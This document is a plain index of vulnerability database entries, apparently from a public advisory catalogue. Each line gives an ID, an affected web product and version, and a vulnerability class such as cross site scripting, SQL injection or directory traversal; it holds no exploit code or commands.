[29833] Symantec Web Gateway up to 5.2.1 SNMPConfig.php privilege escalation
[29812] Cisco Wireless LAN Solution Engine up to 2.12 User Interface archiveapplydisplay.jsp cross site scripting
[29696] phpWebSite 0.10.2 index.php loadconfig directory traversal
[29681] TinyWebGallery 1.3/1.4 index.php cross site scripting
[29669] Jl Webworks QuickBlogger 1.4 acc.php cross site scripting
[29553] PHPWebGallery 1.4.1 category.php cross site scripting
[29552] PHPWebGallery 1.4.1 search.php cross site scripting
[29500] IBM WebSphere Application Server up to 4.0.1 denial of service
[29483] PhpWebGallery 1.4.1 category.php sql injection
[29420] WebCalendar 1.1.0 Error Message groups.php information disclosure
[29390] Desiderata Software Blazix Web Server up to 1.2.5 privilege escalation
[29385] Turnkey Web Tools PHP Live Helper 1.8 initiate.php Stored directory traversal
[29384] Turnkey Web Tools PHP Live Helper 1.8 initiate.php privilege escalation
[29375] Web-app.org WebAPP up to 0.9.9.3.2 index.cgi cross site scripting
[29370] Jjwwebdesign Phpbookingcalendar 1.0c details_view.php sql injection
[29355] Webhost Automation Helm Web Hosting Control Panel up to 3.2.10 domains.asp cross site scripting
[29334] Pablo Software Solutions Baby ASP Web Server up to 3.1.0 privilege escalation
[29330] IBM Tivoli Business Systems Manager up to 3.1.0.0 Web Console apwc_win_main.jsp cross site scripting
[29318] Benson It Solutions 1WebCalendar 4.0 viewevent.cfm sql injection
[29297] BEA WebLogic Server up to 8.1 denial of service
[29277] phpWebsite 0.7.3/0.8.2/0.8.3 friend.php sql injection
[29152] Efs Software Efs Web Server 3.2 File Sharing memory corruption
[29151] Efs Software Efs Web Server 3.2 File Sharing cross site scripting
[29150] Efs Software Efs Web Server 3.2 File Sharing memory corruption
[29132] Solido Systems Ravenous Web Server up to 0.7.0 unknown vulnerability
[29081] IBM WebSphere Application Server up to 5.0.2.10 information disclosure
[29016] UKiWeb UKiBoard 3.0.1 fce.php show_post cross site scripting
[29011] NetworkActiv NetworkActiv Web Server 3.5.15 information disclosure
[28972] phpWebSite up to 0.10.2 topics.php sql injection
[28852] Leif M. Wright Web Blog 3.5 ViewCommentsLog Stored cross site scripting
[28851] Leif M. Wright Web Blog 3.5 privilege escalation
[28850] Leif M. Wright Web Blog 3.5 Blog.CGI unknown vulnerability
[28849] Leif M. Wright Web Blog 3.5 unknown vulnerability
[28846] Mantis up to 1.00rc4 Web Access manage_user_page.php sql injection
[28842] MitriDAT Web Calendar Pro dropbase.php sql injection
[28799] PerlBlog 1.08/1.09/1.09b weblog.pl memory corruption
[28798] PerlBlog 1.08/1.09/1.09b weblog.pl directory traversal
[28797] PerlBlog 1.08/1.09/1.09b weblog.pl cross site scripting
[28780] cPanel dowebmailforward.cgi cross site scripting
[28754] webSPELL 4.01.00 search.php sql injection
[28689] IBM Lotus Domino iNotes Client 6.5.4 Domino Web Access cross site scripting
[28571] cPanel webmailaging.cgi cross site scripting
[28483] BEA WebLogic Server up to 9.0 Connection Filter denial of service
[28481] BEA WebLogic Portal up to 8.1 Web Services unknown vulnerability
[28479] BEA WebLogic Server up to 8.1 weak encryption
[28478] BEA WebLogic Portal up to 8.1 Deployment unknown vulnerability
[28477] BEA WebLogic Server up to 8.1 unknown vulnerability
[28476] BEA WebLogic Server up to 8.1 denial of service
[28475] BEA WebLogic Server up to 9.0 denial of service
[28303] PayPal PHP Toolkit 0.50 Web Services ipn_success.php unknown vulnerability
[28284] Webwiz Web Wiz Forums 6.34 search_form.asp cross site scripting
[28280] OrjinWeb E-Commerce index.php memory corruption
[28245] TheWebForum 1.2.1 login.php sql injection
[28244] TheWebForum 1.2.1 register.php cross site scripting
[28180] VEGO Web Forum up to 1.26 functions.php sql injection
[28137] IBM WebSphere Application Server up to 5.0.2.5 information disclosure
[28136] IBM WebSphere Application Server 6.0 information disclosure
[28111] Sun Java System Web Proxy Server up to 3.6 denial of service
[28101] phpWebSite up to 0.10.1 index.php sql injection
[28094] Jl Webworks QuickBlogger 1.4 cross site scripting
[28076] BEA WebLogic Server up to 8.1 Password Authentication username/password unknown vulnerability
[28075] BEA WebLogic Server up to 8.1 unknown vulnerability
[28074] BEA WebLogic Server up to 8.1 Administration Server unknown vulnerability
[28073] BEA WebLogic Server 9.0 denial of service
[28072] BEA WebLogic Server up to 8.1 Stored unknown vulnerability
[28069] BEA WebLogic Server up to 8.1 unknown vulnerability
[28068] BEA WebLogic Server 8.1 unknown vulnerability
[28067] BEA WebLogic Server up to 8.1 Administration Server unknown vulnerability
[28066] BEA WebLogic Server up to 8.1 unknown vulnerability
[28065] BEA WebLogic Server up to 8.1 unknown vulnerability
[28063] BEA WebLogic Server up to 8.1 Network Address Translation information disclosure
[28062] BEA WebLogic Server up to 8.1 unknown vulnerability
[28060] BEA WebLogic Server up to 9.0 cross site scripting
[28059] BEA WebLogic Server up to 8.1 denial of service
[28057] WebHost Automation up to 3.2.5 cross site scripting
[28020] BEA WebLogic Server up to 8.1 unknown vulnerability
[28019] BEA WebLogic Server up to 8.1 weak encryption
[27902] BlueCoat Webproxy 4.0/5.0/5.1/5.2/6.0 Web Console memory corruption
[27889] Bluecoat Webproxy 4.0/5.0/5.1/5.2/6.0 memory corruption
[27878] VMware ESX Server up to 2.5.2 Management Interface cross site scripting
[27654] IBM WebSphere Application Server login.jsp cross site scripting
[27571] Hitachi Groupmax Collaboration Web Client up to 07 00 06-10-/b denial of service
[27570] Hitachi Groupmax Collaboration Web Client up to 07 00 06-10-/b cross site scripting
[27538] MarmaraWeb MarmaraWeb E-commerce index.php cross site scripting
[27537] MarmaraWeb MarmaraWeb E-commerce index.php memory corruption
[27481] Php Web Scripts Ad Manager Pro up to 2.0 advertiser_statistic.php sql injection
[27479] Php Web Scripts Link Up Gold up to 2.5 tell_friend.php cross site scripting
[27478] Php Web Scripts Link Up Gold up to 2.5 poll.php sql injection
[27476] PhpWebGallery up to 1.7.2 comments.php sql injection
[27468] Netgear RP114 3.26 Interfaces memory corruption
[27294] PHP Web Statistik 1.4 pixel.php denial of service
[27293] PHP Web Statistik 1.4 stat.php denial of service
[27292] PHP Web Statistik 1.4 stat.cfg information disclosure
[27291] PHP Web Statistik 1.4 stat.php cross site scripting
[27263] WebCalendar 1.0.1 edit_report_handler.php sql injection
[27261] WebCalendar 1.0.1 layers_toggle.php sql injection
[27240] WebCalendar 1.0.1 export_handler.php sql injection
[27228] WebCalendar 1.0.1 activity_log.php sql injection
[27186] Webmin 1.1.60/1.2.40 Login Form miniserv.pl denial of service
[27133] Oliver May Athena PHP Website Administration 0.1a athena.php privilege escalation
[27037] IBM WebSphere Application Server 5.0 memory corruption
[27008] Revize CMS setwebspace.jsp cross site scripting
[26988] Litespeed Technologies LiteSpeed Web Server 2.1.5 admin/config/confmgr.php cross site scripting
[26928] SAP SAP Web Application Server 6.10 cross site scripting
[26927] SAP SAP Web Application Server up to 6.10 fameset.htm cross site scripting
[26926] SAP SAP Web Application Server up to 6.10 frameset.htm unknown vulnerability
[26842] IBM WebSphere Application Server up to 6.x information disclosure
[26819] Hasbani Web Server 2.0 denial of service
[26715] Dr. Web Antivirus 4.32b unknown vulnerability
[26572] Dr.Web Antivirus unknown vulnerability
[26346] IBM Rational ClearQuest up to 2002.05.00 Web Client cross site scripting
[26171] Foojan PHP Weblog Error Message daylinks/index.php information disclosure
[26170] Foojan PHP Weblog index.php cross site scripting
[26163] WebCalendar 1.0.0 settings.php privilege escalation
[25937] NetworkActiv NetworkActiv Web Server 1.0 cross site scripting
[25853] Php.warpedweb.net PHPPageProtect 1.0.0a admin.php cross site scripting
[25841] WebCalendar up to 1.0.0 assistant_edit.php information disclosure
[25755] Bdc Enterprises Web Wiz Forums 7.9 unknown vulnerability
[25654] Sun ONE web server 6.1 Application Firewall cross site scripting
[25652] BEA WebLogic Server 8.1 Application Firewall cross site scripting
[25651] IBM WebSphere Application Server 5.1 Application Firewall cross site scripting
[25596] Symantec Veritas Backup Exec up to 9.0 RPC Interface beserver.exe memory corruption
[25562] Yaws Webserver up to 1.55 information disclosure
[25538] osCommerce 2.1/2.2 Cvs/2.2 Ms1/2.2 Ms2 Web Cache index.php weak authentication
[25406] Newmad Technologies PicoWebServer 1.0 memory corruption
[25343] Ipswitch Imail 8.2 Hotfix 2/8.13 Web Calendar jsp directory traversal
[25339] BEA WebLogic Server 6.1 memory corruption
[25338] BEA WebLogic Server up to 8.1 denial of service
[25337] BEA WebLogic Server up to 8.1 Administration Console loginform.jsp cross site scripting
[25336] BEA WebLogic Server up to 7.0 denial of service
[25334] BEA WebLogic Server up to 7.0 cross site scripting
[25333] BEA WebLogic Server up to 8.1 Security Provider cross site scripting
[25270] Jeuce Jeuce Personal Web Server 2.13 denial of service
[25269] Jeuce Jeuce Personal Web Server 2.13 directory traversal
[25268] Jeuce Jeuce Personal Web Server 2.13 Personal WebServer memory corruption
[25253] Fastream Netfile Ftp Web Server 7.4.6 Installation denial of service
[25233] Web-app.org WebAPP 0.9.9/0.9.9.2/0.9.9.2.1 apage.cgi privilege escalation
[25178] WowBB Web Forum 1.6 view_user.php sql injection
[25039] Soft3304 04WebServer 1.81 Installation directory traversal
[25010] Oracle Application Server Web Cache WebCache cross site scripting
[24965] Horde IMP up to 3.2.7 Rc1 Webmail Client cross site scripting
[24903] Francisco Burzi PHP-Nuke 7.5/7.6 Web Cache modules.php weak authentication
[24900] Webmin up to 1.1.40 Configuration File privilege escalation
[24898] PMSoftware Simple Web Server 1.0 memory corruption
[24822] Microsoft Outlook 2003 Outlook Web Access weak authentication
[24806] Active Web Softwares Active Auction House 7.1 account.asp cross site scripting
[24780] Francisco Burzi PHP-Nuke 7.6 Web_Links cross site scripting
[24778] Francisco Burzi PHP-Nuke 7.6 Web_Links information disclosure
[24777] Francisco Burzi PHP-Nuke 7.6 Web_Links search sql injection
[24727] Web-app.org WebAPP 0.9.9/0.9.9.1/0.9.9.2 subs.pl privilege escalation
[24651] PHP-Post Web Forum up to 0.32 cross site scripting
[24650] PHP-Post Web Forum 0.22 weak authentication
[24519] Cupidsystems CIS WebServer 3.5.13 directory traversal
[24517] phpWebSite up to 0.10.0 Error Message index.php information disclosure
[24511] phpWebSite up to 0.10.0 gif.php information disclosure
[24455] Gentoo Webmin 1.140/1.150/1.160/1.170 unknown vulnerability
[24413] Savant Savant Webserver 3.1 memory corruption
[24411] EMotion MediaPartner Web Server 5.0 cross site scripting
[24410] EMotion MediaPartner Web Server 5.0 directory traversal
[24385] eMotion MediaPartner Web Server 5.0 information disclosure
[24237] MySQL MaxDB 7.5.00.23/7.5.00.25 WebDAV getifheader memory corruption
[24227] MySQL MaxDB up to 7.5.00.23 WebDAV wdvhandler_commonutils.c getlocktokenheader memory corruption
[24145] Active Web Softwares Active Auction House 7.1 default.asp sql injection
[24128] WebCalendar 0.9.45 user.php user_valid_crypt sql injection
[23851] Novell GroupWise 6.0/6.5 WebAccess information disclosure
[23611] Pensacola Web Designs Xtremeasp Photogallery 2.0 Login adminlogin.asp sql injection
[23600] Novell NetWare 6.5 WebAdmin webadmin-apache.conf weak authentication
[23599] Webwiz Web Wiz Forums 7.7a pop_up_ip_blocking.asp privilege escalation
[23535] Soft3304 04WebServer 1.41 denial of service
[23534] Soft3304 04WebServer 1.40 information disclosure
[23520] Free Web Chat 2.0 usermanager.java adduser denial of service
[23495] Pegasi Web Server 0.2.2 cross site scripting
[23494] Pegasi Web Server 0.2.2 directory traversal
[23395] Codeworx Technologies DCP-Portal up to 5.3.2 Web Cache calendar.php weak authentication
[23387] Inweb Mail Server 2.40 SMTP Service denial of service
[23365] National Science Foundation Squid Web Proxy Cache 2.3.stable5 privilege escalation
[23364] Jetty HTTP Server up to 4.2.3 Web Services directory traversal
[23313] IPSwitch IMail up to 8.1 Web Calendar calendar denial of service
[23312] IPSwitch IMail up to 8.1 Web Messaging denial of service
[23292] IPSwitch IMail Express up to 8.4 Web Messaging memory corruption
[23273] Twilight Utilities Web Server 2.0.0.0 postfile.exe directory traversal
[23270] Twilight Utilities Web Server 2.0.0.0 postfile.exe memory corruption
[23264] IBM Lotus Domino 6.5.1 WebAdmin directory traversal
[23251] Fizmez Web Server 1.0 denial of service
[23242] Leif M. Wright Web Blog 1.1 blog.cgi privilege escalation
[23241] Minihttpserver.net Forum Web Server up to 1.6 post1.htm cross site scripting
[23223] Vizer Web Server 1.9.1 denial of service
[23219] DotNetNuke 1.0.6/1.0.7/1.0.8/1.0.9/1.0.10d Configuration File web.config information disclosure
[23218] phpWebSite up to 0.9.3.1 sql injection
[23215] Mbedthis AppWeb HTTP Server up to 1.0 information disclosure
[23214] Mbedthis AppWeb HTTP Server up to 1.0.1 denial of service
[23213] Mbedthis AppWeb HTTP Server up to 1.0.1 denial of service
[23159] Netwin Surgeldap up to 1.0g Administration Interface admin.cgi unknown vulnerability
[23125] Mbedthis AppWeb HTTP Server up to 1.1.2 Access Restriction unknown vulnerability
[23124] Mbedthis AppWeb HTTP Server up to 1.1.2 information disclosure
[23121] Express-Web Content Management System default.asp cross site scripting
[23103] Turbotraffictrader Php 1.0 ttt-webmaster.php cross site scripting
[23093] WowBB Web Forum 1.61 view_user.php sql injection
[23092] WowBB Web Forum 1.61 view_user.php cross site scripting
[23090] DevoyBB Web Forum 1.0.0 sql injection
[23089] DevoyBB Web Forum 1.0.0 cross site scripting
[23051] Allwebscripts Mysqlguest awsguest.php cross site scripting
[23045] Borland Web Server For Corel Paradox up to 1.0b3 directory traversal
[22998] Conceptronic Cadslr1 Adsl Router 3.04n HTTP Administration Interface denial of service
[22947] Aborior Encore Web Forum display.cgi privilege escalation
[22911] Chat Anywhere up to 2.72 Administration Web Page unknown vulnerability
[22910] PWebServer Web Server 0.3.3 directory traversal
[22838] MyWebServer 1.0.3 admin information disclosure
[22837] MyWebServer 1.0.3 denial of service
[22833] Full Revolution aspWebCalendar 4.5 Login Page calendar.asp sql injection
[22799] phpWebSite up to 0.9.3.4 index.php cross site scripting
[22797] Soft3304 04webserver 1.42 Webserver denial of service
[22796] Soft3304 04webserver 1.42 Webserver weak authentication
[22795] Soft3304 04webserver 1.42 Error Page response_default.html cross site scripting
[22793] Webcalendar view_entry.php unknown vulnerability
[22792] Webcalendar Error Message validate.php information disclosure
[22791] Webcalendar up to 0.9.44 init.php unknown vulnerability
[22790] Webcalendar up to 0.9.44 login.php cross site scripting
[22789] Webcalendar up to 0.9.44 view_entry.php cross site scripting
[22782] Webhost Automation Helm Control Panel up to 3.1.19 cross site scripting
[22781] Webhost Automation Helm Control Panel up to 3.1.19 sql injection
[22779] Minihttpserver.net Web Forums Server 1.6 directory traversal
[22757] Webmin up to 1.1.50 privilege escalation
[22706] Singapore Image Gallery Web Application 0.9.10 cross site scripting
[22705] Gallery Image Gallery Web Application 0.9.10 admin.class.php unknown vulnerability
[22704] Singapore Image Gallery Web Application 0.9.10 thumb.php directory traversal
[22482] Gweb HTTP Server 0.6 URL directory traversal
[22467] Dell OpenManage Web Server 3.4.0 HTTP POST memory corruption
[22351] Sun Java System Web Proxy Server up to 3.6 SP4 Connection Request memory corruption
[22349] Hawking Technology HAR11A DSL Router Management Interface information disclosure
[22319] Icecast Web Server up to 1.3.12 list.cgi cross site scripting
[22188] phpWebSite 0.7.3/0.8.2/0.8.3/0.9.3/0.9.3.4 Comments Module/Notes Module cross site scripting
[22187] phpWebSite 0.7.3/0.8.2/0.8.3/0.9.3/0.9.3.4 Calendar Module sql injection
[22164] Web-app.org WebAPP 0.9.9 directory traversal
[68444] Cisco ASA 9.1(1.170) WebVPN DOM cross site scripting
[68442] Symantec Web Gateway up to 5.2.1 privilege escalation
[68424] IBM WebSphere DataPower XC10 2.1/2.5 Java SDK memory corruption
[68423] IBM WebSphere DataPower XC10 2.1/2.5 Java SDK unknown vulnerability
[68422] IBM WebSphere DataPower XC10 2.1/2.5 cross site request forgery
[68421] IBM WebSphere DataPower XC10 2.1/2.5 information disclosure
[68420] IBM WebSphere DataPower XC10 2.1/2.5 cross site scripting
[68419] IBM WebSphere DataPower XC10 2.1/2.5 cross site scripting
[68417] Microsoft Exchange 2013 Outlook Web Access privilege escalation
[68416] Microsoft Exchange 2007/2010/2013 Outlook Web Access privilege escalation
[68415] Digium Asterisk 11.x/12.x/13.x WebSocket memory corruption
[68278] Dell SonicWall GMS Virtual Appliance 7.2 GMS ViewPoint Web Application privilege escalation
[68232] Apple Mac OS X 10.9.5 WebKit denial of service
[68231] Apple Mac OS X 10.9.5 Web Cache information disclosure
[68210] Trend Micro Interscan Web Security Virtual Appliance 5.1/5.5/5.6/6.0 privilege escalation
[68157] SAP Network Interface Router 40.4 SAProuter Numeric Error
[68054] Pidgin up to 2.10.9 User Interface libpurple memory corruption
[67918] Oracle 7.0/8.0/8.1/8.2/8.3 Web Access commons-beanutils-1.8.0.jar privilege escalation
[67882] Oracle WebLogic Server 10.0.2.0/10.3.6.0/12.1.1.0/12.1.2.0/12.1.3.0 WLS Console unknown vulnerability
[67873] Oracle WebLogic Server 10.0.2.0/10.3.6.0/12.1.1.0/12.1.2.0/12.1.3.0 WLS-Console commons-beanutils-1.8.0.jar privilege escalation
[67872] Oracle WebLogic Server 10.0.2.0/10.3.6.0/12.1.1.0/12.1.2.0/12.1.3.0 WebLogic Tuxedo Connector unknown vulnerability
[67728] Cisco WebEx Meetings Server 2.5 Password information disclosure
[67715] Cisco WebEx Meetings Server 2.5.0.4 ClientUpgrade Servlet privilege escalation
[67538] Juniper Junos Pulse SSL VPN Web Server cross site scripting
[67537] Juniper Junos Pulse SSL VPN/UAC Web Server cross site scripting
[67526] Cisco IOS XR 5.0.1.CE/5.2.1.CE Command Line Interface information disclosure
[67448] McAfee Web Gateway up to 7.4.1 Accounts Tab Password information disclosure
[67423] Cisco IOS 15.1(4)M3 on 1800 ISDN Basic Rate Interface denial of service
[67406] Barracuda Web Security Flex 4.1 cross site scripting
[67405] Barracuda Web Security Flex 4.1 cross site scripting
[67403] Fabrice Bellard QEMU ACPI PCI Hotplug Interface memory corruption
[67385] Cisco Webex MeetMeNow Server directory traversal
[67277] IBM WebSphere Portal 6.1/7.0/8.0/8.5.0 Redirect
[67276] IBM WebSphere Portal 6.1/7.0/8.0/8.5.0 Error Code Host information disclosure
[67275] IBM WebSphere Portal 6.1/7.0/8.0/8.5.0 cross site scripting
[67274] IBM WebSphere Portal 6.1/7.0/8.0/8.5.0 cross site scripting
[67272] Barracuda Web Application Firewall 7.8.1.013 Token weak authentication
[67255] Cisco WebEx Meetings Server 1.5(.1.131) Stack Trace information disclosure
[67254] Cisco WebEx Meetings Server 1.5(.1.131) checkJS.jsp cross site request forgery
[67253] Cisco WebEx Meetings Server 1.5 information disclosure
[67252] Cisco WebEx Meetings Server 1.5 user.php weak encryption
[67251] Cisco WebEx Meetings Server 1.5 Message OutlookAction User information disclosure
[67250] Cisco TelePresence 4.0(2.8) Management Interface cross site scripting
[67210] Tenable Nessus 5.2.3/5.2.4/5.2.5/5.2.6/5.2.7 Web UI 2.3.4 information disclosure
[67173] Juniper Junos 11.4/12.1x44/12.1x45/12.1x46/12.1x47 WebAuth Login cross site scripting
[67167] Citrix Netscaler Gateway up to 9.3-62.4/10.1-126.12 Administration User Interface cross site scripting
[67152] Oracle Secure Global Desktop 4.63/4.71/5.0/5.1 Workspace Web Application unknown vulnerability
[67102] Oracle Agile Product Collaboration 9.3.3 Web Client unknown vulnerability
[67084] Oracle WebLogic Server 12.1.1.0/12.1.2.0 Web Container cross site scripting
[67083] Oracle WebLogic Server 10.0.2.0/10.3.6.0 unknown vulnerability
[67082] Oracle WebLogic Server 10.0.2.0/10.3.6.0/12.1.1.0 unknown vulnerability
[67081] Oracle WebLogic Server 10.0.2.0/10.3.6.0/12.1.1.0/12.1.2.0 Console unknown vulnerability
[67076] Oracle WebLogic Server 10.0.2.0/10.3.6.0/12.1.1.0/12.1.2.0 JVM denial of service
[67075] Oracle WebLogic Server 10.0.2.0/10.3.6.0 information disclosure
[67074] Oracle WebLogic Server 10.0.2.0/10.3.6.0/12.1.1.0/12.1.2.0 denial of service
[67073] Oracle WebLogic Server 10.3.6.0/12.1.1.0/12.1.2.0 denial of service
[67072] Oracle WebCenter Portal 11.1.1.7/11.1.1.8 Portlet Services unknown vulnerability
[67070] Oracle WebLogic Server 10.0.2.0/10.3.6.0/12.1.1.0/12.1.2.0 unknown vulnerability
[67068] Oracle WebLogic Server 10.0.2.0/10.3.6.0/12.1.1.0/12.1.2.0 WLS Core Components unknown vulnerability
[67067] Oracle WebLogic Server 10.0.2.0/10.3.6.0/12.1.1.0/12.1.2.0 unknown vulnerability
[67066] Oracle WebLogic Server 10.3.6.0/12.1.1.0/12.1.2.0 unknown vulnerability
[67065] Oracle WebLogic Server 10.3.6.0/12.1.1.0/12.1.2.0 Security/Policy unknown vulnerability
[67064] Oracle WebLogic Server 10.0.2.0/10.3.6.0/12.1.1.0/12.1.2.0 unknown vulnerability
[67063] Oracle WebLogic Server 10.0.2.0/10.3.6.0/12.1.1.0/12.1.2.0 unknown vulnerability
[67062] Oracle WebCenter Portal 11.1.1.7.0/11.1.1.8.0 Portlet Services information disclosure
[67061] Oracle iPlanet Web Server 6.1/7.0 Security Numeric Error
[67060] Oracle iPlanet Web Proxy Server 4.0.24 Security Numeric Error
[67047] Cisco WebEx Meetings Server memory corruption
[67041] Cisco WebEx Meetings Server 2.0.1/2.5.0 File Transfer privilege escalation
[22166] EFS Easy File Sharing Web Server 1.25 HTTP Request denial of service
[22165] EFS Easy File Sharing Web Server 1.25 HTTP Request disk_c information disclosure
[22084] IBM Websphere Caching Proxy Server 5.02 HTTP GET denial of service
[22077] Fastream NETFile FTP/Web Server up to 6.7.2.1085 Floppy Drive Hang denial of service
[22076] Fastream NETFile FTP/Web Server up to 6.7.2.1085 directory traversal
[22045] Webmin/Usermin 1.070/1.140 Account Lockout weak authentication
[21992] Shawn Webb Webbsyte Chat 0.9.0 Connection denial of service
[21922] BEA WebLogic Server up to 8.1 SP2 Access Restriction SecurityRoleAssignmentMBean.toXML privilege escalation
[21887] Oracle Application Server Web Cache 9.0.0.4.0/9.0.2.3.0/9.0.3.1.0/9.0.4.0.0 HTTP Request Method memory corruption
[21815] Aldo Vargas Aldos Web Server 1.5 HTTP GET Request directory traversal
[21797] DiGi Web Server HTTP GET Request denial of service
[21775] FaSTream Netfile Ftp Web Server 6.5.1.980 Login denial of service
[21657] Sun Java System Application Server up to 7.0 SOAP Web Service denial of service
[21656] Sun One Application Server 6.0 SOAP Web Service denial of service
[21637] Aldo Vargas Aldos Web Server 1.5 Path information disclosure
[21516] WildTangent WebDriver 4.0 WTHoster/WebDriver strcat memory corruption
[21511] Reptile Web Server 2002-01-05 GET Request denial of service
[21508] Leif M. Wright Web Blog 1.1 directory traversal
[21455] Novell GroupWise 6.0 Sp3 WebAccess unknown vulnerability
[21427] PSCS VPOP3 Web Mail Server 2.0e/2.0f admin/index.html cross site scripting
[21357] BEA WebLogic Server up to 7.0.0.1 In-Memory Session Replication race condition
[21304] Logicworks WEB-ERP up to 0.1.4 HTTP Request logicworks.ini Password privilege escalation
[21287] Aprelium Abyss Web Server up to 1.1.3 HTTP GET Request privilege escalation
[21261] Aprelium Abyss Web Server up to 1.1.2 HTTP privilege escalation
[21260] Aprelium Abyss Web Server up to 1.1.2 HTTP GET Request memory corruption
[21246] Twilight Webserver 1.3.3.0 GET Request denial of service
[21228] Easy File Sharing Web Server 1.2 option.ini Password information disclosure
[21227] Easy File Sharing Web Server 1.2 denial of service
[21183] NX Web Content Management System 2002 Prerelease1 URL mass_operations.inc.php privilege escalation
[21155] BEA WebLogic Server up to 8.1 SP1 Node Manager denial of service
[21154] BEA WebLogic Server up to 8.1 SP1 Java Message Service config.xml Password information disclosure
[21153] BEA WebLogic Server up to 8.1 SP1 T3 over SSL weak encryption
[21141] BDC Web Wiz Forums up to 7.5 post_message_form.asp privilege escalation
[21126] Plug And Play Web Server 1.0002c FTP Service memory corruption
[21055] Cherokee Web Server up to 0.4.5 POST Request connection.c denial of service
[21041] SAP Database Server up to 7.4.03.29 Web-Tools privilege escalation
[21039] SAP Database Server up to 7.4.03.29 Web-Tools privilege escalation
[21038] SAP Database Server up to 7.4.03.29 Web-Tools waadmin.wa memory corruption
[21037] SAP Database Server up to 7.4.03.29 Web-Tools waadmin.wa privilege escalation
[21014] BEA WebLogic Server up to 8.1 InteractiveQuery.jsp cross site scripting
[20947] Truenorth IA WebMail Server 3.1.0 GET Request memory corruption
[20923] Plug And Play Web Server Proxy 1.0002c GET Request denial of service
[20917] Telcondex Simplewebserver 2.12.30210 Build3285 Header memory corruption
[20890] phpWebSite 0.9.0 Calendar Module Format String
[20889] phpWebSite 0.9.0 Pear Library TimeZone.php localtime Path information disclosure
[20888] phpWebSite 0.9.0 cross site scripting
[20887] phpWebSite 0.9.0 Calendar Module sql injection
[20885] BEA WebLogic Server up to 7.0 Servlet Container/Console Application cross site scripting
[20815] Microsoft Windows Distributed Component Object Model Interface memory corruption
[20790] BEA WebLogic Server NodeManager privilege escalation
[20782] Oracle E-Business Suite up to 11.5.8 Web Report Review FNDWRR.exe memory corruption
[20748] Cisco IOS 12.2 on Aironet Web Server denial of service
[20637] Ashley Brown iWeb Server Encoded URL directory traversal
[20636] Ashley Brown iWeb Server HTTP Request directory traversal
[20553] Snowblind Web Server 1.0 HTTP Request memory corruption
[20552] Snowblind Web Server 1.0 URL denial of service
[20551] Snowblind Web Server 1.0 HTTP Request directory traversal
[20550] Snowblind Web Server 1.0 HTTP Request directory traversal
[20526] Francisco Burzi PHP-Nuke 5.0/6.0 Web_Links index.php viewlink sql injection
[20469] MyWebServer 1.0.2 Error Message Path information disclosure
[20360] Novell NetWare 5.1/6.0 Web Handler for Perl Version information disclosure
[20359] Novell NetWare 5.1/6.0 Web Handler for Perl directory traversal
[20358] Novell NetWare 5.1/6.0 Web Handler for Perl privilege escalation
[20325] IBM Lotus Domino Web Server up to 6.0.0 nhttp.exe s_Validation denial of service
[20324] IBM Lotus Domino Web Server up to 6.0.0 nhttp.exe h_PageUI denial of service
[20323] IBM Lotus Domino Web Server up to 6.0.1 COM Object Control Handler memory corruption
[20322] IBM Lotus Domino Web Server up to 6.0.0 memory corruption
[20286] Radiobird Software Webserver 4 Everyone 1.22 URL directory traversal
[20246] Juniper Netscreen ScreenOS up to 4.0.0r6 Secure Command Shell Management Interface denial of service
[20235] Symantec Raptor Firewall 6.5/6.5.2 Secure Webserver 1.1 privilege escalation
[20223] BEA WebLogic Server up to 7.0 Servlet privilege escalation
[20204] IBM Lotus Domino up to R4.5 R6 Web Retriever Client memory corruption
[20179] Webmin 1.0.50/1.0.60 Base64 Encoded String miniserv.pl weak authentication
[20120] Apache Tomcat up to 3.3.1 web.xml privilege escalation
[20045] Key Focus KF Web Server 1.0.8 MIME Type directory traversal
[20033] Webchat 1.5 on XOOPS index.php sql injection
[20030] Inweb Mail Server 2.01 HELO Command memory corruption
[20012] SWS Simple Web Server 0.0.3/0.0.4/0.1.0 URL denial of service
[20002] Webmin up to 0.990 RPC Module privilege escalation
[19960] BlueFace Falcon Web Server up to 2.0.0.1021 404 Error Message cross site scripting
[19915] Netdave Webster Http Server URL cross site scripting
[19911] Netdave Webster Http Server URL directory traversal
[19910] Netdave Webster Http Server URL memory corruption
[19906] HP Secure Web Server For Tru64 up to 5.1a IGMP denial of service
[19898] pWins Webserver up to 0.2.5 Unicode Character directory traversal
[19859] Comscripts Web Server Creator 0.1 index.php/customize.php privilege escalation
[19858] Soft3304 04webserver 1.20 URL information disclosure
[19843] Webmin 0.99 Printer Administration Module privilege escalation
[19831] ActiveXperts ActiveWebserver Link cross site scripting
[19820] phpWebSite 0.8.3 IMG Tag article.php cross site scripting
[19819] BEA WebLogic Server up to 7.0.0 Request Buffer information disclosure
[19794] Software602 Web Server up to 2002.0.02.915 HTTP Request /admin/ privilege escalation
[19791] Lucent Access Point Service Router 300 300/600/1500 Administration Interface memory corruption
[19788] Savant Webserver 3.1 HTTP Request cgitest.exe denial of service
[19787] Savant Webserver 3.1 Encoded URL weak authentication
[19784] BEA Weblogic Integration up to 7.0 Servlet 2.3 Specification privilege escalation
[19783] BEA WebLogic Server 7.0/7.0.0.1 EJB privilege escalation
[19746] Ganglia PHP RRD Web Client 1.0.2 graph.php passthru privilege escalation
[19727] WWWeBBB Forum 3.82 Beta HTTP Request page.cgi directory traversal
[19707] Webcalendar 0.9.31/0.9.32/0.9.33/0.9.34 Directory information disclosure
[19706] PhpWebGallery 1.0 Cookie isadmin.php weak authentication
[19656] IBM Lotus Domino 5.0.8 Web Server User information disclosure
[19647] Sun Java Web Start 1.0/1.0.1/1.0.1.01/1.0.1_01 privilege escalation
[19641] HP Praesidium Webproxy 1.0 on HP-UX privilege escalation
[19636] Gamecheats Advanced Web Server Professional 1.030000 HTTP Request advserver.exe denial of service
[19593] Goahead Webserver 2.1 GET Request memory corruption
[19589] Webmin up to 1.0.00 SSL Key weak encryption
[19583] Radiobird Web Server 4 Everyone 1.28 GET Request memory corruption
[19549] Telcondex SimpleWebServer 2.06.20817 GET Request denial of service
[19539] MyWebServer 1.0.0/1.0.1/1.0.2 HTTP Request memory corruption
[19512] SWS Simple Web Server up to 0.1.0 recv privilege escalation
[19508] SWS Simple Web Server up to 0.1.0 404 Error Message denial of service
[19506] SWS Simple Web Server up to 0.1.0 HTTP Request directory traversal
[19501] Orion Application Server 1.5.3 web-inf privilege escalation
[19500] Oracle Application Server up to 9.0.2.0.1 on Windows web-inf privilege escalation
[19499] Jo Webserver 1.0 Rc1 web-inf privilege escalation
[19498] HP Application Server 8.0 web-inf privilege escalation
[19497] Macromedia JRun 3.0/3.1/4.0 on Windows web-inf privilege escalation
[19471] Savant Webserver 3.1 HTTP GET Request denial of service
